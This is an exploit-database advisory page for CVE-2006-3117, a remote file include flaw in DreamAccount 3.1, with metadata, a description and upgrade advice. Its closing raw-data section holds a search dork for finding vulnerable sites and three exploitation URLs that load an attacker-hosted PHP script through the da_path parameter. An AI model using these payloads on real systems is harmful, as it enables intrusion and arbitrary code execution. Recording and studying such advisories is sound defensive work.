DreamAccount - exploit.company

vendor:

DreamAccount

by:

Aesthetico

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: DreamAccount

Affected Version From: 3.1

Affected Version To: 3.1

Patch Exists: YES

Related CWE: CVE-2006-3117

CPE: a:dreamcost.com:dreamaccount:3.1

Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2006-3117/, https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2006-0573/, https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2006-0573/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2006

DreamAccount <= 3.1 - Remote File Include Vulnerability

DreamAccount version 3.1 and prior are prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code in the context of the webserver process.

Mitigation:

Upgrade to DreamAccount version 3.2 or later.

Source

Exploit-DB raw data:

Title: DreamAccount <= 3.1 - Remote File Include Vulnerability
-----------------------------------------------------------------
Vendor: dreamcost.com
URL: http://dreamcost.com
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "powered by DreamAccount"
-----------------------------------------------------------------

Exploitation:

/auth.cookie.inc.php?da_path=http://www.yourspace.com/yourscript.php?
/auth.header.inc.php?da_path=http://www.yourspace.com/yourscript.php?
/auth.sessions.inc.php?da_path=http://www.yourspace.com/yourscript.php?

# milw0rm.com [2006-06-05]